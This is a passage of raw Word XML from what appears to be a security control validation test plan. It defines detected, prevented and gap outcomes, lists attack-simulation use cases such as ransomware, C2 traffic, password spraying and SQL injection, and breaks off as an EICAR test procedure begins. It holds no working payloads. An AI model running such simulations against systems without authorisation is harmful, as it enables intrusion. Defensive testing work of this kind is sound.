              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5560"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The control raised an alert on the activity.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Prevented</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5560"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The control blocked the activity before it completed.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Pass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Gap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5560"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The activity ran and nothing was logged or alerted.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1900"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
        </w:rPr>
        <w:t xml:space="preserve">Important – blocked activity does not produce a result alert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">When a control blocks an action, the action never completes, so the behaviour-based outcome will not occur. A blocked web payload will not pop an alert box, a quarantined file will not execute, and a stripped registry key will not open a shell. This is expected and is recorded as a prevention. During web application testing of the customer's HR system, for example, script-based cross-site-scripting payloads were blocked by the application framework's request validation, so no script executed. That block is a prevention pass, not a missed test. For every test, first establish whether the activity ran or was blocked, and only then look for a detection alert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">8.  Test Procedures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The use cases in scope are summarised below, grouped by category. Each procedure is carried out from the assessment host using built-in tooling. Replace the placeholders (shown in angle brackets) with the agreed values for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tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5660"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Use case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="1F3864" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Category</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UC0032</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5660"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical malware detected on EDR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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UC0149</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Multiple AV infections on same host</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UC0125</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5660"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Common ransomware extensions detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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UC0036</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APT group process creation (masquerading)</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UC0182</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5660"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Application parents spawning malicious children</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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UC0185</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Abuse of accessibility binaries</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SPLUC0187</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5660"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Scheduled tasks calling malicious child processes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>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UC0043</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Threat activity detected (recon)</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Endpoint</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UC0053</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5660"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Horizontal port scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Network</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UC0054</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Vertical port scan</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Network</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UC0249</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5660"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Prohibited port activity detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Network</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UC0141</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Command-and-control (C2) traffic</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Network</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UC0046</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5660"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Password spray detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Network / Identity</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UC0228</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SQL injection attempt</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Web</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UC0229</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5660"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Web application exploit detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Web</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UC0222</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Suspicious email attachment / mail malware</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Email</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SPLUC0107</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5660"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Suspected phishing email detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Email</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UC0575</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Multiple DLP violations for a user</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DLP</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UC0458</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5660"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Azure activity CRUD operation detected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cloud</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UC0215</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Explicit MFA deny</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Cloud</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UC0327</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5660"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Azure AD privileged access outside PIM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cloud</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M365 password spraying</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Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5660"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Malicious MFA takeover</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Cloud</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1700"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">UC0110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5660"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Privilege change on firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2000"/>
            <w:shd w:fill="F2F2F2" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="40"/>
              <w:left w:type="dxa" w:w="80"/>
              <w:bottom w:type="dxa" w:w="40"/>
              <w:right w:type="dxa" w:w="80"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Network device</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">9.  Endpoint Procedures</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="80" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
        </w:rPr>
        <w:t xml:space="preserve">9.1  Critical malware on EDR (UC0032)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Create the EICAR test file on disk and read it to trigger the antivirus or EDR engine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F2F2F2" w:val="clear"/>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="18"/>
